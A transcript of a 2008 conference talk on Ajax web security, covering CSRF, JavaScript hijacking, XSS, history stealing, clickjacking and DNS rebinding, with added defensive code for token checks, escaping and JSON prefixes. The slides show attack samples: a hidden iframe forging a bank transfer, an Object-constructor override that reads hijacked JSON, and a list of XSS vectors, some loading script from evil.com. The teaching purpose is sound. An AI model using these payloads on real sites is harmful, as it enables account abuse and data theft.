Ajax Security

38,749 views

A talk from the Ajax Experience
    Ajax Security Presentation Transcript

    • Ajax Security: Keeping your application safe. Joe Walker. Copyright SitePen, Inc. 2008. All Rights Reserved
    • 89 out of 10 Websites have serious vulnerabilities
    • Goal: Keep the bad guys out of your website
    • The Attackers. Who is the attacker? • Troublemakers / Thieves. Who is the victim? • Your data / Your users / Your partners
    • Agenda: CSRF, Login CSRF • JavaScript Hijacking • XSS • History Stealing • Combination Attacks: Session Fixation + ADP + Clickjacking
    • CSRF (Cross Site Request Forgery): You can still abuse someone else’s cookies and headers even if you can’t read them
    • Recap: Cross-Domain Rules. On www.bank.com: c = document.cookie; alert(c); /* Shows cookies from www.bank.com */ On www.evil.com: c = document.cookie; alert(c); /* Shows cookies from www.evil.com */
    • Abusing a Cookie without reading it. www.bank.com says: "Welcome to Bank.com. We offer the best rates anywhere in the world, guaranteed. Give us your money and we will look after it in the same way we look after little baby kittens." www.evil.com says: "Welcome to Evil.com. We’ve got lots of warez to give away for freee. Download our stuffs and then come back and get more stuffs. Videoz, Warez, Codez, Mp3s." Hidden in the evil.com page: <iframe width=0 height=0 src="http://bank.com/transfer?amnt=all&dest=MrEvil"/>
    • CSRF: JavaScript is not always required to exploit a CSRF hole. Often all you need is: • <iframe src="dangerous_url"> • or <img src="dangerous_url"/> • or <script src="dangerous_url"> You can’t use XHR because cross-domain rules prevent the request from being sent
    • CSRF: CSRF attacks are write-only (with one exception). Both GET and POST can be forged. Referrer checking is not a complete fix. It’s not just cookies that get stolen: • HTTP-Auth headers • Active Directory Kerberos tokens
    • CSRF - Protection: Force users to log off (not a 100% solution). Check referrer headers (https only; not a 100% solution). Include authentication tokens in the body of EVERY request (the only complete solution)
    • CSRF - Protection: Security tokens in GET requests are not a great idea (bookmarks, caches, GET is idempotent etc). POST means forms with hidden fields • OWASP servlet filter: http://www.owasp.org/index.php/CSRF_Guard Double-submit cookie pattern (Ajax requests only) • Read the cookie with JavaScript and submit it in the body
    • Login CSRF (Tricking someone into thinking they are you): CSRF turned inside out
    • Login CSRF: If I can make your browser do things behind your back, how about logging you out of some service and back in as me? What are the possibilities when you think that you are you, but you’re not; you’re me?
    • Login CSRF - Attacks: What can I do? • See what you search for • See what books you want to buy • Read emails that you send • Steal credit card details through PayPal • etc
    • Login CSRF - Defense: If submitting over https, use referrer checking • Do not assume no referrer is safe. Use authentication tokens in your login form. Watch out for session fixation attacks • Invalidate the server session on login and re-create it
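    As an added example (not code from the talk or from SitePen), here is a server-side check that combines the two CSRF defences above: referrer checking over https with a missing referrer treated as unsafe, and the double-submit cookie pattern with the body token compared against the cookie in constant time. The origin name, cookie name and request objects are constructed for the demonstration.

```javascript
// Added example, not from the slides. Server-side CSRF check for a state-changing
// Ajax request, combining referrer checking (https only, and "no referrer" is not
// safe) with the double-submit cookie pattern (token in a cookie, echoed in the body).
// Requests here are plain constructed objects standing in for a real HTTP library.

const SITE_ORIGIN = "https://bank.example"; // assumed: the site's own https origin
const TOKEN_COOKIE = "csrftoken";           // assumed cookie name

// Constant-time comparison, so a wrong token takes as long to reject as a right one.
function safeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string") return false;
  let diff = a.length ^ b.length;
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    diff |= (a.charCodeAt(i) || 0) ^ (b.charCodeAt(i) || 0);
  }
  return diff === 0;
}

function parseCookies(header) {
  const jar = {};
  for (const part of (header || "").split(";")) {
    const eq = part.indexOf("=");
    if (eq > 0) jar[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return jar;
}

// Returns null when the request may proceed, otherwise a short rejection reason.
function checkCsrf(req) {
  // GET must never change state (the slides: tokens in GET are a bad idea anyway).
  if (req.method === "GET" || req.method === "HEAD") return null;

  // Defence 1: referrer check. Only meaningful when the form posts over https,
  // and an absent referrer is rejected rather than trusted.
  const referer = req.headers["referer"];
  if (!referer || !referer.startsWith(SITE_ORIGIN + "/")) return "bad-referrer";

  // Defence 2: double-submit cookie. Our own page's script read the cookie and
  // copied it into the body; evil.com can make the browser send the cookie but
  // cannot read it, so it cannot supply a matching body token.
  const cookieToken = parseCookies(req.headers["cookie"])[TOKEN_COOKIE];
  const bodyToken = req.body ? req.body[TOKEN_COOKIE] : undefined;
  if (!cookieToken || cookieToken.length < 16) return "no-cookie-token";
  if (!safeEqual(cookieToken, bodyToken)) return "token-mismatch";
  return null;
}

// Constructed sample traffic. TOKEN is a made-up value, not a real secret.
const TOKEN = "c0ffee0123456789abcdef";
const legitRequest = {
  method: "POST",
  headers: { referer: SITE_ORIGIN + "/transfer", cookie: "sid=abc; csrftoken=" + TOKEN },
  body: { amnt: "10", dest: "alice", csrftoken: TOKEN },
};
// What the hidden <iframe src="http://bank.com/transfer?..."> on evil.com produces:
// the browser attaches the cookie, but the body carries no token and the referrer
// is the attacker's page.
const forgedRequest = {
  method: "POST",
  headers: { referer: "https://evil.example/warez", cookie: "sid=abc; csrftoken=" + TOKEN },
  body: { amnt: "all", dest: "MrEvil" },
};
```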
    • JavaScript Hijacking (or how your GMail contacts were at risk): Sucking data out of Objects before they’re created
    • JavaScript Hijacking: “CSRF is write-only with one known exception”. Using <script> automatically evaluates the returned script. So if you can just find a way to intercept scripts as they are evaluated ...
    • <script type="text/javascript"> function Object() { alert("Hello, World"); } var x = {}; </script>
    • <script type="text/javascript"> function Object() { this.__defineSetter__('wibble', function(x) { alert(x); }); } var x = {}; x.wibble = "Hello, World"; </script>
    • <script type="text/javascript"> var obj; function Object() { obj = this; this.__defineSetter__('killme', function(x) { for (key in obj) { if (key != 'killme') { alert('Stolen: ' + key + '=' + obj[key]); } } }); setTimeout("obj['killme']='ignored';", 0); } </script> <script src="http://example.com/data-service/">
    • JavaScript Hijacking: When you serve JavaScript from a website it could be evaluated in a hostile environment. Protect secrets in JavaScript in the same way that you would protect them elsewhere
    • JavaScript Hijacking: Sometimes people wish to have a double layer of security to prevent evaluation: • /*<JSON_HERE>*/ (Don’t do this) • while(true); <JSON_HERE> (Google) • throw new Error(""); <JSON_HERE> (DWR) • {}&& <JSON_HERE>
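    As an added example (not code from the talk or from DWR or Google), here is both halves of the "double layer" just listed: the server prefixes its JSON with one of the guards from the slide, and the legitimate XHR client strips a known guard and parses with JSON.parse rather than eval(). The contact list is a constructed sample.

```javascript
// Added example, not from the slides: the "double layer" against JavaScript hijacking.
// The server prefixes its JSON with a string that a legitimate XHR client removes, but
// that stops the body from yielding data when the browser evaluates it via <script src>.

// The prefixes named on the slide. Evaluated as a script, each one loops forever,
// throws, or is a syntax error before the data literal is ever constructed.
const HIJACK_GUARDS = ["while(true);", 'throw new Error("");', "{}&&"];

// Server side (assumed helper): wrap the data before sending it.
function wrapJson(data, guard = HIJACK_GUARDS[0]) {
  return guard + JSON.stringify(data);
}

// Client side: accept only bodies that carry one of the known guards, and parse the
// remainder with JSON.parse, never eval(). Throwing on an un-guarded body means a
// misconfigured endpoint is noticed instead of being quietly served as hijackable JSON.
function parseGuardedJson(body) {
  const text = body.replace(/^\s+/, "");
  for (const guard of HIJACK_GUARDS) {
    if (text.startsWith(guard)) return JSON.parse(text.slice(guard.length));
  }
  throw new Error("response lacks an anti-hijacking prefix");
}

// True when the raw body is still a bare array/object literal, i.e. exactly the
// shape that the Object()/setter trick on the previous slides can capture.
function isBareJson(body) {
  try {
    JSON.parse(body);
    return true;
  } catch (e) {
    return false;
  }
}

// Constructed sample: the kind of contact list the GMail example refers to.
const contacts = [{ name: "Alice", email: "alice@example.test" }];
const guardedBody = wrapJson(contacts);     // "while(true);[{...}]"
const bareBody = JSON.stringify(contacts);  // what an unprotected service returns
```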
    • XSS (Cross Site Scripting): Abusing someone’s trust in your typing
    • XSS: 2 types • Reflected: Script embedded in the request is ‘reflected’ in the response • Stored: Attacker’s input is stored and played back in later page views
    • XSS Scenario: You let the user enter their name. Someone is going to enter their name like this: Joe<script src="http://evil.com/danger.js"> Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe. Generally HTML is not a valid input, but sometimes it is: • Blogs, MySpace, Wikis, RSS readers, etc
    • XSS - Making User Input Safe: So, you filter out ‘<script.*>’ and then you’re safe. Right?
    • XSS - Places that scripts get eval()ed:
      1. <table background="javascript:danger()">
      2. <input type='image' src='javascript:danger()'/>
      3. <object type="text/x-scriptlet" data="evil.com/danger.js">
      4. <img src='javascript:danger()'/>
      5. <frameset><frame src="javascript:danger()">
      6. <link rel="stylesheet" href="javascript:danger()"/>
      7. <base href="javascript:danger()">
      8. <meta http-equiv="refresh" content="0;url=javascript:danger()">
      9. <p style='background-image: url("javascript:danger()")'>
      10. <a href='javascript:danger()'>
      11. <tr background="javascript:danger()">
      12. <body onload='danger()'>
      13. <div onmouseover='danger()'>
      14. <body background="javascript:danger()">
      15. <div onscroll='danger()'>
      16. <div onmouseenter='danger()'>
      17. <style>@import evil.com/danger.js</style>
      18. <style>BODY{-moz-binding:url("http://evil.com/danger.js#xss")}</style>
      19. <xss style="behavior:url(danger.htc);">
      20. <div style="background-image: url(javascript:danger())">
      21. <div style="width: expression(danger());">
      22. <xss style="xss:expression(danger())">
      Many more: http://ha.ckers.org/xss.html
    • XSS - Making User Input Safe: It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html" link</a> makes perfect sense to a browser.
    • XSS - Making User Input Safe: It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html">link makes perfect sense to a browser.
    • XSS - Making User Input Safe: It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html >link</a> makes perfect sense to a browser.
    • XSS - Making User Input Safe: It’s made 1000 times worse by browsers being able to make sense of virtually anything. This (depending on some encoding tricks): ¼a href="a.html"¾link¼/a¾ makes perfect sense to a browser.
    • XSS - Making User Input Safe: And we haven’t got into: • Flash (ActionScript ~= JavaScript) • SVG (can embed JavaScript) • XML Data Islands (IE only) • HTML+TIME. You can use both <object> and <embed> for many of these
    • XSS - The Heart of the Problem: “Be conservative in what you do; be liberal in what you accept from others” (Postel’s Law)
    • XSS - The Heart of the Problem (diagram: In + A → Out B)
    • The web developers get lazy ...
    • The browser fixes the problems ...
    • The users like the new browser ...
    • The web developers get even lazier ...
    • The browser fixes the problems ...
    • The users like the new browser even more ...
    • XSS - The Heart of the Problem: ¼STYLE¾@import'javas cri pt:danger()';¼/STYLE¾
    • XSS - Protection (HTML is Illegal): 1. Filter inputs by white-listing input characters • Remember to filter header names and values 2. Filter outputs for the destination environment. For HTML: < → &lt; > → &gt; ' → &apos; " → &quot; & → &amp; For JavaScript Strings (but see later): ' → \' " → \" LF → \n CR → \r * → \uXXXX Other environments have other special chars
    • XSS - Protection (well-formed HTML is legal): 1. Filter inputs as before 2. Validate as HTML and throw away if it fails 3. Swap characters for entities (as before) 4. Swap back whitelist of allowed tags, e.g.: • &lt;strong&gt; → <strong> 5. Take extra care over attributes: • &lt;a href=&quot;([^&]*)&quot;/&gt; → <a href="$1"/> 6. Take great care over regular expressions
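    As an added example (not code from the talk), here are the two output filters from the previous slide and the "swap back a whitelist of tags" step from this one, for the injection points the talk calls protectable. The href swap-back is deliberately narrower than the slide's regex: it also requires an absolute http(s) URL, because a user-controlled href is otherwise an XSS hole. The sample inputs are constructed.

```javascript
// Added example, not from the slides: output escaping for HTML and JavaScript-string
// contexts, plus the entity-then-whitelist swap-back used when well-formed HTML is legal.

const HTML_ENTITIES = { "<": "&lt;", ">": "&gt;", "'": "&apos;", '"': "&quot;", "&": "&amp;" };

// Plain content and quoted attribute values: <div>$</div>, <input value="$">.
function escapeHtml(s) {
  return String(s).replace(/[<>'"&]/g, (c) => HTML_ENTITIES[c]);
}

// JavaScript string values: <script>str = "$";</script>. Everything outside a small
// safe set becomes \uXXXX, so quotes, CR/LF and "</script>" can never terminate the
// literal or the script block. (Stricter than the slide's per-character table.)
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g, (c) => {
    return "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0");
  });
}

// Well-formed HTML is legal: escape everything, then restore only <strong> and
// <a href="...">...</a> pairs whose href is an absolute http(s) URL. Because the text
// is already entity-escaped, the href group cannot contain a raw quote, "<" or ">",
// and a javascript: or data: URL never matches the https?:// prefix.
function allowSafeTags(userHtml) {
  let out = escapeHtml(userHtml);
  out = out.replace(/&lt;(\/?)strong&gt;/g, "<$1strong>");
  out = out.replace(
    /&lt;a href=&quot;(https?:\/\/[^&\s]*)&quot;&gt;([\s\S]*?)&lt;\/a&gt;/g,
    '<a href="$1">$2</a>'
  );
  return out;
}

// Constructed samples: the slide's "Joe", and a post with one allowed and one
// disallowed tag.
const joeName = 'Joe<script src="http://evil.com/danger.js">';
const userPost = '<strong>hi</strong> <a href="javascript:danger()">click</a>';
```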
    • XSS - Protection (malformed HTML is legal): 1. Find another way to do it / Swap jobs / Find some other solution to the problem 2. Create a tag soup parser to create a DOM tree from a badly formed HTML document • Remember to recursively check encodings 3. Create a tree walker that removes all non-approved elements and attributes
    • There is NO WAY to protect against some injection points
    • XSS - Injection Points: Places you can protect: • Plain content <div>$</div> • Some attribute values <input name=x value="$"> (but take care) • JavaScript string values: <script>str = "$";</script> (but take care) Anything else is likely to be unsafe
    • XSS - Injection Points: Places you can’t easily protect: • <script>$</script> • <div $> • <div style="$">... • <div background="$"> • <img src="$"> • etc. If users can affect CSS values, hrefs, srcs or plain JavaScript then you are likely to have an XSS hole
    • XSS Tricks: Comment Power-up
    • XSS - Comment Power-up: Commonly reflected attacks have length restrictions. How to create space for an injection attack: • Use ‘<script>/*’ in a restricted unprotected field and ‘*/’ in a later unrestricted protected field
    • XSS - Summary: For data input: • Restrict allowed characters for destination type. For data output: • Escape for the destination environment • Ensure encoding is specified (e.g. UTF-8). Allow injection only into known safe points. Never assume that a hole is too small to jump through
    • History Stealing: I know where you’ve been, parts 1, 2, 3
    • History Stealing - Part 1: Mr. Evil wants to know if you visit bank.com. He creates a page with a link and uses a script to read the CSS link color: • purple: customer • blue: not a customer
    • History Stealing - Part 2: 2 methods of detecting link color: • Easy - use JavaScript to read CSS properties • When JS is turned off - use CSS to ping the server
    • History Stealing - Part 2: Point a script tag at a protected HTML resource, detect differing replies by differing error messages: <script src="http://mail.google.com/mail"> http://ha.ckers.org/weird/javascript-website-login-checker.html
    • History Stealing - Part 3: A page can quickly check thousands of sites and find where you bank and store your email. A page can follow your clicks around the net: • Check for common set of URLs • Page reports hits to server • Server reads hit pages, greps out links, sends links back • Page checks and follows a click-stream
    • Combination Attacks: Small holes don’t add up, they multiply up
    • Web Worms: If your site isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts. XHR/Flash/Quicktime can be used as a vector. Web worms grow much faster than email worms. So far, infections have been mostly benign, like how email worms were in the early 90’s ... http://www.whitehatsec.com/downloads/WHXSSThreats.pdf
    • Intranet Hacking: History stealing to enumerate hosts inside the firewall. Anti-DNS pinning to read HTML from inside. Many routers / firewalls / etc have default passwords, which an attacker can exploit. Use CSRF to alter router / firewall settings. http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf
    • Clickjacking: When the page you are looking at is not the page you think you are looking at
    • Clickjacking - Protection: if (window.top != window) { document.body.style.display = "none"; }
    • ADP = Anti DNS Pinning: Moving intranet servers into your domain
    • Anti-DNS Pinning (diagram: the user’s browser, the DNS server for evil.com, the attacker’s web server at 1.2.3.4 and the intranet web server at 10.0.0.1)
    • Anti-DNS Pinning: Browser: “Let’s visit evil.com”
    • Anti-DNS Pinning: Browser to DNS: “What’s the IP address for evil.com?”
    • Anti-DNS Pinning: DNS to browser: “You need 1.2.3.4 (timeout = 1 sec)”
    • Anti-DNS Pinning: Browser to 1.2.3.4: “Can I have http://evil.com?”
    • Anti-DNS Pinning: 1.2.3.4 to browser: HTML + JavaScript that creates an iframe 2 seconds after the page has loaded
    • Anti-DNS Pinning: Time passes (2 seconds)
    • Anti-DNS Pinning: Browser to DNS: “What’s the IP address for evil.com?”
    • Anti-DNS Pinning: DNS to browser: “You need 10.0.0.1”
    • Anti-DNS Pinning: Browser to 10.0.0.1: “Can I have http://evil.com/blah?”
    • Anti-DNS Pinning: This web server is really http://intranet.corp.com
    • Anti-DNS Pinning: Outer frame reads text from inner iframe and sends it back to 1.2.3.4
    • Anti-DNS Pinning: About ‘Pinning’: Browsers ‘pin’ addresses to stop short timeouts. DNS round-robin forces re-query of DNS if the website appears to be down. So websites can get around pins by firewalling themselves, thus appearing to be down
    • Anti-DNS Pinning: It’s not great for the Internet: the browser thinks the domain is evil.com, so cookies for innocent.com are not sent: cookie-protected resources are safe (for now). But it’s great for Intranet hacking: no cookies needed to read from 192.168.0.1 or 127.0.0.1
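    As an added example (not code from the talk), here is a small offline simulation of the Anti-DNS Pinning sequence above, together with the two things that stop it: a browser that pins the first address for the session, and an intranet server that only answers for its own Host name. The resolver, browser and servers are constructed stand-ins; the intranet host name is assumed.

```javascript
// Added example, not from the slides: the DNS-rebinding timeline from the diagram,
// run against a pinning/non-pinning browser and a trusting/hardened intranet server.
// evil.com, 1.2.3.4 and 10.0.0.1 are the slide's own values.

// Attacker-controlled DNS: the first answer is the attacker's box with a 1 s TTL;
// once the page has loaded, every later answer points at the intranet address.
function makeFlippingDns() {
  let answered = false;
  return function resolve(name) {
    if (name !== "evil.com") return null;
    const ip = answered ? "10.0.0.1" : "1.2.3.4";
    answered = true;
    return { ip, ttl: 1 };
  };
}

// Servers keyed by IP. The intranet server either answers whatever Host header
// arrives (vulnerable) or, when hardened, only answers for its own name.
function makeServers(intranetChecksHost) {
  return {
    "1.2.3.4": () => "attacker page: loads an iframe of evil.com/blah after 2 seconds",
    "10.0.0.1": (req) => {
      if (intranetChecksHost && req.host !== "intranet.corp.com") return "400 unknown host";
      return "SECRET intranet page";
    },
  };
}

// A browser that caches each answer for its TTL and optionally "pins" the first
// address for the whole session regardless of TTL. (The slide's round-robin bypass,
// where the attacker firewalls 1.2.3.4 so the browser re-queries, is not modelled.)
function makeBrowser(resolve, servers, pinDns) {
  const cache = {};
  return function load(host, path, now) {
    const entry = cache[host];
    if (!entry || (!pinDns && now >= entry.expires)) {
      const answer = resolve(host);
      cache[host] = { ip: answer.ip, expires: now + answer.ttl };
    }
    // The Host header carries the name the user typed, not the IP the socket reached.
    return servers[cache[host].ip]({ host, path });
  };
}

// The slide's timeline: load evil.com at t=0, then the iframe request at t=2.
// Returns what the outer frame (same origin, evil.com) can read from the inner iframe.
function runScenario(pinDns, intranetChecksHost) {
  const load = makeBrowser(makeFlippingDns(), makeServers(intranetChecksHost), pinDns);
  load("evil.com", "/", 0);
  return load("evil.com", "/blah", 2);
}
```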
    • Questions? Joe Walker http://sitepen.com http://directwebremoting.org/blog/joe
    • Web 2.0 Hacking: Everything has a down side
    • Web 2.0 Hacking: Building blocks: • Google Alerts: Search to EMail • Mailinator: EMail to RSS • Ponyfish: Web to RSS via scraping • Storage: DabbleDB, Zoho • Yahoo Pipes: RSS remixing • L8R: Cron for EMail • Google Mashup Editor: RSS to REST API • Dapper, OpenKappow
    • More Information
    • Dropping SSL after login is dangerous: Being able to snoop on someone else’s cookie is virtually the same as being able to snoop on their password. Some services (e.g. Google) default to http after login (bad), but allow you to use https for the whole session: • https://mail.google.com/mail/ • https://www.google.com/calendar/ • etc.
    • Useful Tools. Firefox: • NoScript - Accept scripts only from sites you trust • AltCookies - Accept cookies only from sites you trust • EditCookies - Alter cookies for testing • Firebug - Dig deeply into HTTP/JavaScript/CSS. General: • Paros - Filtering Proxy (can be configured to be transparent) • Burp - Like Paros • Fiddler - Like Paros with integration into IE